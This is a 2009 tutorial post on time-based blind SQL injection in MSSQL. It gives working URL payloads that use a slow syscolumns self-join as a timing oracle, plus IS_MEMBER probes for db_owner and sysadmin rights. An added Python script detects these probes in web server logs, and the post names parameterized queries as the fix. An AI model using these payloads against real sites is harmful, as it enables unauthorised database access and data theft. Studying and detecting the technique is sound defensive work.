Timeout-based MSSQL blind injection

Posted on 2009-7-5 05:53:38, from Bijie, Guizhou
Suppose there is a page where, no matter how you inject, the page content is always the same, but its code really does contain an injection point:
select * from table where columnid = $input_id
Injecting by way of the errors the page returns is absolutely impossible, because the page content is always identical. Vulnerable pages like this definitely exist; you can build one yourself.

So how do we inject in this case?
We use time-based blind injection.

First, look at two statements:

select * from sysobjects where id=1 and (SELECT count(*) FROM syscolumns AS sys1,
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6)>0
and 1=1

select * from sysobjects where id=1 and (SELECT count(*) FROM syscolumns AS sys1,
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6)>0
and 1=2

The first statement will definitely time out; the page should not return a result within half an hour. The second returns a result immediately.
If your test results differ from what I describe, replace
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6
with
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6.....syscolumns AS sys100
100 of them in total; if it still does not time out, your computer must be from another planet.

OK, now suppose the vulnerable page is http://127.0.0.1/xml/mssql/index.asp?id=1

We inject like this:


http://127.0.0.1/xml/mssql/index.asp?id=1 and (SELECT count(*) FROM syscolumns AS sys1,
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6)>0
and 1=1

http://127.0.0.1/xml/mssql/index.asp?id=1 and (SELECT count(*) FROM syscolumns AS sys1,
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6)>0
and 1=2

If the response times differ by a lot, there is definitely an injection. Now we determine the privileges.

http://127.0.0.1/xml/mssql/index.asp?id=1 and (SELECT count(*) FROM syscolumns AS sys1,
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6)>0
and 1=(SELECT IS_MEMBER('db_owner'))

http://127.0.0.1/xml/mssql/index.asp?id=1 and(SELECT count(*) FROM syscolumns AS sys1,
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6)>0
and 1=(SELECT IS_MEMBER('sysadmin'))

For other injections, refer to the other tutorials online.
You only need to modify the and 1=(SELECT IS_MEMBER('sysadmin')) part.

This works because, if your condition does not hold, the
(SELECT count(*) FROM syscolumns AS sys1,
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6)>0
check is never entered; if your condition holds, the
(SELECT count(*) FROM syscolumns AS sys1,
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6)>0
check runs to completion.
So if the page times out, your condition holds and you have guessed the information correctly. If it does not time out, that proves your guessed condition is wrong.
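As an added defender-side example (not part of the original post), the following Python script reads constructed IIS-style W3C log lines and surfaces the two traces this technique leaves in a web server log: a request parameter that carries a wide self-join on syscolumns/sysobjects, and a group of such requests that share the same heavy subquery but differ wildly in time-taken, which is the timing oracle being read. The log format, its field order and the thresholds are assumptions; the sample lines are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed W3C-style IIS log lines (assumed field order):
# date time cs-uri-stem cs-uri-query sc-status time-taken(ms)
SAMPLE_LOG = """\
2009-07-05 05:53:38 /xml/mssql/index.asp id=1 200 31
2009-07-05 05:53:40 /xml/mssql/index.asp id=1+and+(SELECT+count(*)+FROM+syscolumns+AS+sys1,syscolumns+as+sys2,syscolumns+AS+sys3,syscolumns+AS+sys4,syscolumns+AS+sys5,syscolumns+AS+sys6)>0+and+1=1 200 30012
2009-07-05 05:54:11 /xml/mssql/index.asp id=1+and+(SELECT+count(*)+FROM+syscolumns+AS+sys1,syscolumns+as+sys2,syscolumns+AS+sys3,syscolumns+AS+sys4,syscolumns+AS+sys5,syscolumns+AS+sys6)>0+and+1=2 200 28
2009-07-05 05:54:15 /xml/mssql/index.asp id=1+and+(SELECT+count(*)+FROM+syscolumns+AS+sys1,syscolumns+as+sys2,syscolumns+AS+sys3,syscolumns+AS+sys4,syscolumns+AS+sys5,syscolumns+AS+sys6)>0+and+1=(SELECT+IS_MEMBER('db_owner')) 200 29987
2009-07-05 05:55:01 /xml/mssql/index.asp id=2 200 27
2009-07-05 05:55:09 /xml/mssql/report.asp id=7 200 4120
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3}) (\d+)$")

# One catalog table given an alias, e.g. "syscolumns AS sys3" (case-insensitive).
CATALOG_ALIAS_RE = re.compile(r"\bsys(?:columns|objects)\s+as\s+\w+", re.I)


def parse_log(text):
    """Parse the assumed log layout into dicts; lines that do not match are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        date, time, stem, query, status, taken = m.groups()
        records.append({
            "ts": f"{date} {time}",
            "stem": stem,
            "query": unquote_plus(query),  # decode '+' and %XX so the SQL is readable
            "status": int(status),
            "ms": int(taken),
        })
    return records


def catalog_self_join_width(query):
    """How many aliased catalog tables appear in the query string (0 for normal traffic)."""
    return len(CATALOG_ALIAS_RE.findall(query))


def heavy_payload_signature(query):
    """Drop the text after the final ' and ' so probes that differ only in the
    guessed predicate (1=1, 1=2, IS_MEMBER(...)) fall into one group."""
    idx = query.lower().rfind(" and ")
    return query[:idx] if idx != -1 else query


def find_timing_oracles(records, min_width=3, min_delta_ms=5000):
    """Group heavy-self-join requests by their constant part and compare time-taken.
    A large fast/slow spread inside one group means the server's response time is
    being used as a true/false channel."""
    groups = defaultdict(list)
    for r in records:
        if catalog_self_join_width(r["query"]) >= min_width:
            groups[(r["stem"], heavy_payload_signature(r["query"]))].append(r)
    findings = []
    for (stem, _sig), hits in groups.items():
        fast = min(h["ms"] for h in hits)
        slow = max(h["ms"] for h in hits)
        findings.append({
            "stem": stem,
            "probes": len(hits),
            "fast_ms": fast,
            "slow_ms": slow,
            "oracle": slow - fast >= min_delta_ms,
        })
    return findings


if __name__ == "__main__":
    for f in find_timing_oracles(parse_log(SAMPLE_LOG)):
        print(f)
```

The slow report.asp line is deliberately not flagged: a slow page by itself is not evidence, the signal is a catalog self-join in a parameter plus a bimodal time-taken across near-identical requests. Detection is only a backstop; the real fix for the page's `select * from table where columnid = $input_id` is binding the id as a typed query parameter so user input can never reach the SQL text.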